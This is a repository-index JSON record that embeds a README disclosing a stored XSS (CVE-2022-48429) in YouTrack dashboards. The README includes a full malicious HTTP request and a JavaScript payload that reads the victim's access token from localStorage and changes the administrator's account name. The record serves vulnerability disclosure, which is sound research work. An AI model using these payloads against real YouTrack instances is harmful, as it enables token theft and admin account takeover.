{"id":18035810,"url":"https://github.com/echo-devim/cve-2022-48429_poc","last_synced_at":"2026-01-18T01:35:46.996Z","repository":{"id":247592469,"uuid":"636352279","full_name":"echo-devim/CVE-2022-48429_poc","owner":"echo-devim","description":"PoC for CVE-2022-48429 - Youtrack stored XSS","archived":false,"fork":false,"pushed_at":"2023-05-04T17:01:09.000Z","size":2781,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-10T08:11:30.473Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/echo-devim.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-04T16:55:20.000Z","updated_at":"2024-07-09T11:39:18.000Z","dependencies_parsed_at":"2024-07-09T16:11:40.053Z","dependency_job_id":null,"html_url":"https://github.com/echo-devim/CVE-2022-48429_poc","commit_stats":null,"previous_names":["echo-devim/cve-2022-48429_poc"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2FCVE-2022-48429_poc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2FCVE-2022-48429_poc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2FCVE-2022-48429_poc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2FCVE-2022-48429_poc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/echo-devim","download_url":"https://codeload.github.com/echo-devim/CVE-2022-48429_poc/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247263932,"owners_count":20910489,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-30T12:10:20.992Z","updated_at":"2026-01-18T01:35:46.965Z","avatar_url":"https://github.com/echo-devim.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2022-48429 - YouTrack Stored XSS\n\nThe reported description of the [CVE on the NVD database](https://nvd.nist.gov/vuln/detail/CVE-2022-48429) lacks accuracy.\nThis is a more accurated description:\n\nYoutrack (**version \u003c= 2022.3.65373**) has a **stored** Cross-Site Scripting (XSS) in dashboards. A malicious low-privileged user can create and share a malformed dashboard sending it to other users (e.g. admins). This can lead to an admin takeover.\n\nOriginal author: echo-devim\n\n# Detailed Description \u0026 Proof of Concept (PoC)\nWhile researching security issues in Youtrack version 2022.3.65373 I found an XSS on dashboards.\n\nNon-privileged user can create a new dashboard with malicious widget containing injected Javascript. The dashboard can be shared to other users, like administrators, sending them the malicious code.\n\nThis XSS can target only the specified users and it's really easy to trick the victim to open the malicious dashboard. Infact, the new dashboard will be notified on the homepage of the victim. I noticed that the vulnerability is present since version 2021.4.38425, but it could be older.\n\nThe vulnerable param is \"directive\" when the user adds a new widget.\n\nExample of malicious request to inject the XSS:\n\n```\nPOST /hub/api/rest/dashboards/39ecb0a3-4bb5-45de-9616-9945fd284886 HTTP/1.1\nHost: localhost:8081\nUser-Agent: Mozilla/5.0 (X11; Windows x86_64; rv:105.0) Gecko/20100101 Firefox/105.0\nContent-Type: application/json;charset=utf-8\nContent-Length: 1214\n\n{\"type\":\"DashboardJSON\",\"id\":\"39ecb0a3-4bb5-45de-9616-9945fd284886\",\"name\":\"testxss\",\"owner\":{\"type\":\"user\",\"id\":\"58a24bf5-53ad-4966-9b5d-63cb8dbfef0a\",\"login\":\"test\"},\"data\":{\"widgets\":[{\"id\":\"youtrack-activities-widget\",\"directive\":\"\u003cimg src=a onerror='alert(document.location)'/\u003e\",\"grid\":{\"width\":2,\"height\":2,\"y\":0,\"x\":0},\"config\":{\"created\":\"2023-03-17T10:04:50.590Z\",\"customWidgetConfig\":{\"filter\":{\"title\":null,\"query\":\"by: me\",\"author\":null,\"categoriesIds\":[\"IssueCreatedCategory\",\"ProjectCategory\",\"SummaryCategory\",\"DescriptionCategory\",\"CustomFieldCategory\",\"AttachmentsCategory\",\"LinksCategory\",\"CommentsCategory\"],\"youTrack\":{\"id\":\"731f4f21-b0f9-42bd-9509-127b2d0585e1\",\"homeUrl\":\"/\"},\"refreshPeriod\":240}}}}]},\"permission\":\"OWNER\",\"access\":\"OWNER\",\"favorite\":true,\"ordinal\":0,\"permissions\":[{\"type\":\"UserDashboardPermissionJSON\",\"id\":\"42e794d7-0009-4b00-83f4-45991a0392f0\",\"permission\":\"VIEW\",\"user\":{\"type\":\"user\",\"id\":\"fcbf85ca-4ea9-4b2e-b750-59b08df9c24a\"},\"personality\":{\"type\":\"user\",\"id\":\"fcbf85ca-4ea9-4b2e-b750-59b08df9c24a\",\"name\":\"admin\",\"login\":\"admin\",\"profile\":{\"avatar\":{\"type\":\"defaultavatar\",\"url\":\"http://localhost:8081/hub/api/rest/avatar/fcbf85ca-4ea9-4b2e-b750-59b08df9c24a\"}}}}]}\n```\n\nThen, refreshing the page we'll have the XSS:\n\n![](Screenshot_xss.jpg)\n\n\nThis XSS can allow a low privileged user to perform phishing through fake login forms, redirect the user's browser or even perform admin operations.\n\nEven worse if the platform has the user registration enabled, this can allow an external attacker to register a new user and perform the attack.\n\n\nAs a PoC I used a low privileged test user to change the full name of the administrator account.\n\nCode of the PoC:\n\n```javascript\n\u003cimg src=a onerror=\\\"var authToken = JSON.parse(localStorage.getItem(JSON.parse(localStorage.getItem('__youtrack__'))['serviceId']+'-token'))['accessToken'];$.ajax({type:'GET',url:'/hub/api/rest/users/me',beforeSend: function(xhr, settings) { xhr.setRequestHeader('Authorization','Bearer ' + authToken); },success: function(userdata){changeFullName(userdata['id']);}});function changeFullName(userid){$.ajax({type:'POST',url:'/hub/api/rest/users/'+userid, data:JSON.stringify({'id':userid,'name':'testpwn2'}),contentType: 'application/json; charset=utf-8',dataType: 'json',beforeSend: function(xhr, settings) { xhr.setRequestHeader('Authorization','Bearer ' + authToken ); },success: function(data){console.log(data);}});alert('username changed')}\\\"/\u003e\n```\n\nThis animated gif show the effects. The left window is the page related to the non-privileged user and the right windows is the admin.\n\n![](demo_pwnadmin.gif)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fecho-devim%2Fcve-2022-48429_poc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fecho-devim%2Fcve-2022-48429_poc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fecho-devim%2Fcve-2022-48429_poc/lists"}